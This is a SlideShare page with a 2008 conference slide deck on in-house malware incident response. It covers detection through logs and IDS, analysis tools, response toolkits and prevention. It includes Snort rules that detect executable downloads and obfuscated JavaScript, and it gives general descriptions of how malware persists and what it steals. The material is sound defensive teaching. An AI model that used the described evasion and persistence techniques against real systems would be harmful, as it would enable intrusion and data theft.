Malware Analysis Made Simple SecureWorld Expo Detroit Wednesday, November 5, 2008 Paul Melson
Security Incident Response
Why Not Focus On Prevention? <ul><li>You Should!  But… </li></ul><ul><li>Nothing is 100% secure, blah blah </li></ul><ul><...
You’re Probably Required To <ul><li>An Incident Response Plan is a requirement of: </li></ul><ul><ul><li>FISMA </li></ul><...
Why Do Malware Analysis In-House?
Malware is Number 1!  Yay! <ul><li>Client-side attacks that install malware are the #1 external threat. </li></ul><ul><li>...
Malware Trends
Firewalls & Antivirus Have Lost <ul><li>Client-side attacks, web browsing and e-mail, go right through most firewall polic...
Malware is Adapting Quickly <ul><li>Take away Local Admin? </li></ul><ul><ul><li>Malware that persists in non-admin accoun...
“ But it’s just spyware, right?” <ul><li>Our security analysts found samples in the past 18 months that: </li></ul><ul><ul...
Detection
Anatomy of a Drive-By Download Dropper Malware Servers More Malware JScript Exploit
Log Files <ul><li>Firewall Logs </li></ul><ul><ul><li>Outbound SMTP from workstations (lots!) </li></ul></ul><ul><ul><li>O...
 
IDS/IPS Alerts <ul><li>Most products attempt to detect post-infection traffic, such as IRC or Winny C&C channels </li></ul...
Snort Rules <ul><ul><li>alert tcp $HOME_NET any -> $EXTERNAL_NET !80 (msg: &quot;LOCAL .exe file download on port other th...
Antivirus?! Yes, Antivirus! <ul><li>Many droppers will install multiple pieces of malware.  Your antivirus might detect 1 ...
Analysis
For Starters <ul><li>VirusTotal </li></ul><ul><ul><li>http://www.virustotal.com </li></ul></ul><ul><li>Norman Sandbox </li...
 
Detecting Packed Files <ul><li>Packers are used to obfuscate malware executables from antivirus scanners. </li></ul><ul><l...
Analyzing Binary Files <ul><li>Utilities perform deeper scans of executables to determine the likelihood that they are sus...
 
Behavioral Analysis <ul><li>Utilities analyze system activity while malware is running to identify suspicious or malicious...
 
Network Analysis <ul><li>Analyzing network traffic can identify the presence of malware based on the connections the machi...
Analyzing System Hooks <ul><li>Analyzing system startup/execution hooks can determine if malware/rootkits are present. </l...
 
Building Toolkits
Response Toolkit: CD <ul><li>You could use a thumb drive, but read-only media is helpful here. </li></ul><ul><li>Trusted S...
Analysis Toolkit: VM <ul><li>Use a VM tool that supports snapshots </li></ul><ul><li>“ Thwarting VM Detection” by Ed Skoud...
Prevention & Recovery
Prevention – Whack-a-Mole <ul><li>Add malicious web sites and file names to your web content filter rules. </li></ul><ul><...
Prevention: Local Admin? <ul><li>Restricting local admin access used to work well to prevent malware from persisting on a ...
Parting Shot: Best Practices <ul><li>Active monitoring by security staff. </li></ul><ul><li>Develop response procedures fo...
Q & A Session
Upcoming SlideShare
Loading in...5
×

Malware Analysis Made Simple

4,447

Published on

"Malware Analysis Made Simple" from SecureWorld Expo Detroit, 11/05/2008

Published in: Technology
0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
4,447
On Slideshare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
0
Comments
0
Likes
5
Embeds 0
No embeds

No notes for slide
  • Transcript of "Malware Analysis Made Simple"

    1. 1. Malware Analysis Made Simple SecureWorld Expo Detroit Wednesday, November 5, 2008 Paul Melson
    2. 2. Security Incident Response
    3. 3. Why Not Focus On Prevention? <ul><li>You Should! But… </li></ul><ul><li>Nothing is 100% secure, blah blah </li></ul><ul><li>When (not “if”) an incident occurs, a responsible team with a plan will: </li></ul><ul><ul><li>Respond quickly </li></ul></ul><ul><ul><li>Be thorough </li></ul></ul><ul><ul><li>Keep costs down </li></ul></ul>
    4. 4. You’re Probably Required To <ul><li>An Incident Response Plan is a requirement of: </li></ul><ul><ul><li>FISMA </li></ul></ul><ul><ul><li>HIPAA </li></ul></ul><ul><ul><li>ISO/IEC 27002 </li></ul></ul><ul><ul><li>PCI-DSS </li></ul></ul>
    5. 5. Why Do Malware Analysis In-House?
    6. 6. Malware is Number 1! Yay! <ul><li>Client-side attacks that install malware are the #1 external threat. </li></ul><ul><li>It’s not slowing down any time soon: </li></ul><ul><ul><li>“ Symantec observed an average of 61,940 active bot-infected computers per day, a 17% increase from the previous period.” </li></ul></ul><ul><ul><li>“ In the second half of 2007, 499,811 new malicious code threats were reported, a 136% increase over the first half of 2007.” </li></ul></ul><ul><ul><li>(Source: Symantec Internet Threat Report, April 2008) </li></ul></ul>
    7. 7. Malware Trends
    8. 8. Firewalls & Antivirus Have Lost <ul><li>Client-side attacks, web browsing and e-mail, go right through most firewall policies. </li></ul><ul><li>Antivirus detection rates for current malware files are averaging 30-50%. </li></ul><ul><li>If you’re not adapting some other way, you’ve lost. </li></ul>
    9. 9. Malware is Adapting Quickly <ul><li>Take away Local Admin? </li></ul><ul><ul><li>Malware that persists in non-admin accounts via HKLU Registry hive </li></ul></ul><ul><li>Whitelist apps with Windows Firewall? </li></ul><ul><ul><li>Malware that hooks into browser plugin APIs </li></ul></ul><ul><li>Block IRC at the firewall? </li></ul><ul><ul><li>Malware that uses encrypted HTTP/HTTPS back-channels </li></ul></ul>
    10. 10. “ But it’s just spyware, right?” <ul><li>Our security analysts found samples in the past 18 months that: </li></ul><ul><ul><li>Send spam or launch DDoS attacks </li></ul></ul><ul><ul><li>Give full desktop remote control </li></ul></ul><ul><ul><li>Search “Documents and Settings” for SSNs, credit cards, and saved IE passwords </li></ul></ul><ul><ul><li>Record all screen text and input and report it in near-real time to servers in Russia </li></ul></ul>
    11. 11. Detection
    12. 12. Anatomy of a Drive-By Download Dropper Malware Servers More Malware JScript Exploit
    13. 13. Log Files <ul><li>Firewall Logs </li></ul><ul><ul><li>Outbound SMTP from workstations (lots!) </li></ul></ul><ul><ul><li>Outbound IRC connections </li></ul></ul><ul><ul><li>Peer-to-peer file sharing traffic, esp. Winny </li></ul></ul><ul><ul><li>Sustained high-volume traffic from workstations </li></ul></ul><ul><li>Proxy / Web Filter Logs </li></ul><ul><ul><li>Monitor URL’s ending in “.exe” </li></ul></ul>
    14. 15. IDS/IPS Alerts <ul><li>Most products attempt to detect post-infection traffic, such as IRC or Winny C&C channels </li></ul><ul><li>EmergingThreats.net for Snort, huge list of trojan/malware signatures, all free </li></ul><ul><li>If your IDS can, write some custom rules: </li></ul><ul><ul><li>Look for “.exe” downloads on ports where web filters won’t </li></ul></ul><ul><ul><li>Win32 PE headers in HTTP traffic (renamed files) </li></ul></ul><ul><ul><li>JavaScript obfuscation techniques </li></ul></ul>
    15. 16. Snort Rules <ul><ul><li>alert tcp $HOME_NET any -> $EXTERNAL_NET !80 (msg: &quot;LOCAL .exe file download on port other than 80&quot;; flow:established; content: &quot;GET&quot;; depth:4; content:&quot;.exe&quot;; nocase; classtype:misc-activity; sid:9000160; rev:1;) </li></ul></ul><ul><ul><li>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:&quot;LOCAL Obfuscated JavaScript document.write&quot;; flow:from_server,established; content:&quot;document.write“; nocase; pcre:&quot;/document.write(&quot;0-9][0-9]/i&quot;; classtype:trojan-activity; sid:9000110; rev:1;) </li></ul></ul><ul><ul><li>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:&quot;LOCAL Obfuscated JavaScript unescape&quot;; flow:from_server,established; content:&quot;script>&quot;; nocase; content:&quot;unescape(&quot;; nocase; classtype:trojan-activity; sid:9000111; rev:2;) </li></ul></ul><ul><ul><li>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:&quot;LOCAL Obfuscated JavaScript eval&quot;; flow:from_server,established; content:&quot;script>&quot;; nocase; content:&quot;eval(&quot;; nocase; classtype:trojan-activity; sid:9000112; rev:2;) </li></ul></ul>
    16. 17. Antivirus?! Yes, Antivirus! <ul><li>Many droppers will install multiple pieces of malware. Your antivirus might detect 1 or 2 of them. </li></ul><ul><li>When you see AV alerts from a workstation, check proxy logs for what else was downloaded. </li></ul>
    17. 18. Analysis
    18. 19. For Starters <ul><li>VirusTotal </li></ul><ul><ul><li>http://www.virustotal.com </li></ul></ul><ul><li>Norman Sandbox </li></ul><ul><ul><li>http://www.norman.com/microsites/nsic/Submit/en-us </li></ul></ul><ul><li>CWSandbox </li></ul><ul><ul><li>http://www.cwsandbox.org </li></ul></ul>
    19. 21. Detecting Packed Files <ul><li>Packers are used to obfuscate malware executables from antivirus scanners. </li></ul><ul><li>PEiD </li></ul><ul><ul><li>http://www.peid.info/ </li></ul></ul><ul><li>pefile </li></ul><ul><ul><li>http://code.google.com/p/pefile/ </li></ul></ul><ul><li>Jim Clausing’s packerid.py </li></ul><ul><ul><li>http://handlers.dshield.org/jclausing/ </li></ul></ul>
    20. 22. Analyzing Binary Files <ul><li>Utilities perform deeper scans of executables to determine the likelihood that they are suspicious/malicious </li></ul><ul><li>Mandiant Red Curtain </li></ul><ul><ul><li>http://www.mandiant.com/mrc </li></ul></ul><ul><li>Resource Hacker </li></ul><ul><ul><li>http://angusj.com/resourcehacker/ </li></ul></ul>
    21. 24. Behavioral Analysis <ul><li>Utilities analyze system activity while malware is running to identify suspicious or malicious behavior </li></ul><ul><li>SysAnalyzer </li></ul><ul><ul><li>http://labs.idefense.com/software/malcode.php </li></ul></ul><ul><li>AMIR </li></ul><ul><ul><li>http://www.malwareinfo.org/Utilities/ </li></ul></ul>
    22. 26. Network Analysis <ul><li>Analyzing network traffic can identify the presence of malware based on the connections the machine is generating. </li></ul><ul><li>SniffHit </li></ul><ul><ul><li>http://labs.idefense.com/software/malcode.php </li></ul></ul><ul><li>WireShark </li></ul><ul><ul><li>http://www.wireshark.org </li></ul></ul><ul><li>TCPView </li></ul><ul><ul><li>http://technet.microsoft.com/en-us/sysinternals/ </li></ul></ul>
    23. 27. Analyzing System Hooks <ul><li>Analyzing system startup/execution hooks can determine if malware/rootkits are present. </li></ul><ul><li>OSAM Autorun Manager </li></ul><ul><ul><li>http://www.online-solutions.ru/en/osam_autorun_manager.php </li></ul></ul><ul><li>StartupCPL </li></ul><ul><ul><li>http://www.mlin.net/StartupCPL.shtml </li></ul></ul><ul><li>HiJackThis! And StartupList </li></ul><ul><ul><li>http://www.merijn.org/programs.php </li></ul></ul>
    24. 29. Building Toolkits
    25. 30. Response Toolkit: CD <ul><li>You could use a thumb drive, but read-only media is helpful here. </li></ul><ul><li>Trusted Shell </li></ul><ul><ul><li>Copy of Windows CMD.EXE on CD </li></ul></ul><ul><li>Behavioral Analysis: AMIR </li></ul><ul><li>Network Analysis: TCPView </li></ul><ul><li>Startup Analysis: OSAM, HiJackThis! </li></ul>
    26. 31. Analysis Toolkit: VM <ul><li>Use a VM tool that supports snapshots </li></ul><ul><li>“ Thwarting VM Detection” by Ed Skoudis </li></ul><ul><li>Packer Analysis: PEiD, packerid.py </li></ul><ul><li>Behavioral Analysis: SysAnalyzer </li></ul><ul><li>Network Analysis: Wireshark on HOST </li></ul><ul><li>Binary Analysis: Mandiant Red Curtain </li></ul>
    27. 32. Prevention & Recovery
    28. 33. Prevention – Whack-a-Mole <ul><li>Add malicious web sites and file names to your web content filter rules. </li></ul><ul><li>Block malicious web site addresses with your firewall. </li></ul><ul><li>If your AV/HIPS supports it, blacklist malicious file names and hashes as you find them. </li></ul>
    29. 34. Prevention: Local Admin? <ul><li>Restricting local admin access used to work well to prevent malware from persisting on a machine. Some won’t run at all. </li></ul><ul><li>More and more malware can persist in user space via HKLU Registry and StartUp group. </li></ul><ul><li>But recovery is still easier! </li></ul><ul><li>Develop & test a procedure for renaming local user profiles in Windows to enable quick recovery from infection for non-admins. </li></ul><ul><li>Save downtime costs by not re-imaging. </li></ul>
    30. 35. Parting Shot: Best Practices <ul><li>Active monitoring by security staff. </li></ul><ul><li>Develop response procedures for malware incidents. Focus on response times. </li></ul><ul><li>Contain potential incidents first, then analyze to determine impact. </li></ul>
    31. 36. Q & A Session

    ×